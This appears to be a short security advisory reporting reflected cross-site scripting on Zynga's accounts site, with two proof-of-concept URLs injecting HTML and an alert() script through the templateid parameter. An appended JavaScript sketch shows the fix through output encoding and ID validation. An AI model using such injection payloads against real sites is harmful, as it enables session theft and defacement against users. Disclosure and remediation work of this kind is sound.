Title: Zynga (accounts) Cross site scripting vulnerability
Vendor: www.zynga.com
Author: Raghavendra Karthik D (r007k17-w)
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork: © 2011 Zynga, Inc
--------------------------------------------------------------------------------
* Cross Site Scripting vulnerability

Demo:

1. HTML injection:
http://accounts.zynga.com/?game=&unsub=11046&templateid=%22%3E%3Cfont%20size=22%20name=calibri%3EXSS%20BUG%20DETECTED!!%20%3C/font%3E

2. JavaScript injection:
http://accounts.zynga.com/?game=&unsub=11046&templateid=%22%3E%3Cscript%3Ealert%28%22XSSed_by_Raghavendra_Karthik_D%22%29%3C/script%3E
--------------------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts and 3psilonlambda and all my friends.
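Added example (not part of the original advisory and not Zynga's code): both demo URLs begin the templateid value with %22%3E ("> once decoded), which is consistent with the value being reflected inside a double-quoted HTML attribute. The sketch below assumes a hypothetical hidden-input template and renders the advisory's two values without and with output encoding; every function name and the numeric-ID rule are assumptions.

```javascript
// Hypothetical template: the advisory does not show the page's real markup.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: query value concatenated into a quoted attribute as-is.
function renderUnsafe(templateId) {
  return '<input type="hidden" name="templateid" value="' + templateId + '">';
}

// Hardened pattern: encode on output for the HTML attribute context.
function renderSafe(templateId) {
  return '<input type="hidden" name="templateid" value="' + escapeHtml(templateId) + '">';
}

// Assumption (not confirmed by the advisory): real IDs are short decimal numbers.
function isValidTemplateId(templateId) {
  return /^[0-9]{1,10}$/.test(templateId);
}

// Read templateid the way a server framework would, i.e. percent-decoded.
function templateIdFromUrl(url) {
  return new URL(url).searchParams.get('templateid');
}

// Crude demo check: the template should yield exactly one tag (the <input>).
function countTags(html) {
  return (html.match(/<[a-zA-Z\/][^>]*>/g) || []).length;
}

// The two demo URLs given in the advisory.
const demoUrls = [
  'http://accounts.zynga.com/?game=&unsub=11046&templateid=%22%3E%3Cfont%20size=22%20name=calibri%3EXSS%20BUG%20DETECTED!!%20%3C/font%3E',
  'http://accounts.zynga.com/?game=&unsub=11046&templateid=%22%3E%3Cscript%3Ealert%28%22XSSed_by_Raghavendra_Karthik_D%22%29%3C/script%3E',
];

for (const url of demoUrls) {
  const id = templateIdFromUrl(url);
  console.log('passes ID validation:', isValidTemplateId(id));
  console.log('unencoded, tags =', countTags(renderUnsafe(id)), renderUnsafe(id));
  console.log('encoded,   tags =', countTags(renderSafe(id)), renderSafe(id));
}
```

Encoding on output is the fix that holds regardless of what the parameter is meant to contain; the ID check is an extra layer that rejects both demo values before they reach the template.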